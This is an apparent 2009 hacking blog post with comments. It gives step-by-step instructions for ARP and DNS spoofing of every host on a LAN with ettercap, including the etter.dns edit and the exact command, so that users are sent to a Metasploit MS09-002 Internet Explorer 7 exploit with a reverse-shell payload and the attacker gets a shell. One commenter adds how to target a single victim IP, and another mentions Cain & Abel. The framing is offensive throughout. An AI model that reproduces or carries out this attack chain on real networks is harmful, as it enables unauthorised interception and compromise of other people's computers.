Lol in my last video i showed how to use MS09-002 exploit ,but in that there was
a problem where the Vulnerable URL should be Opened by the enduser but how to do without sending links to them or mailing or hosting somewhere how ?? so i got an idea like
DNS Posioning Concept,we use DNS posioning so that we can redirect all the end users DNS request to our Vulnerable 80 Port so that when ever they open Ie7 we send their
DNS request to our VUlnerable 80 port and they get powned and we get a shell
with the logged in privileges
Tools used : ettercap and MSFgui
1) change the etter.dns config file of ur ettercap tool to change the A records
remove evry thing under A record and use
* A 192.168.147.128 (ur IP) ur system is acting has a DNS now.
2)go to shell and type
ettercap -T -q -M arp:remote -P dns_spoof //
3)now run MSf3 and choose exploits–>windows–> browser–>ms09_002_memory_corruption
4)select ur target WindowsXpSp2
5)use PAYLOAD windows_shell_reverse_tcp
6)and in SRVPORT change to 80 port and remaining will be same and Apply
7) in Enduser once they open Ie7 they are redirected to your Vulnerable 80 Port
and we get a shell
below is the video as usal
http://blip.tv/file/1822479
WirelessPunter
think beyond the limit
February 27th, 2009 at 7:46 pm
You can get dns spoofing working in windows with Cain & Abel as well…then use the msf gui (also in windows) to do the rest if you wished to not use Linux for whatever reason.
March 16th, 2009 at 6:25 pm
Спасибо!
Огромное!
May 13th, 2009 at 9:35 am
I love it! That is way cool man! The steps weren’t that complicated too, which is great.
June 8th, 2009 at 11:00 pm
Is there any way/commands to dns spoof only one machine? in the example above i dont like the idea of MASS dns spoofing…. i mean not all lan computers. i want only one machine in the lan to be the victim
June 10th, 2009 at 2:47 am
instead of
ettercap -T -q -M arp:remote -P dns_spoof //
use
ettercap -T -q -M arp:remote -P dns_spoof /IP
April 1st, 2010 at 5:31 am
hm. hope to see same more info. Can we speake about it?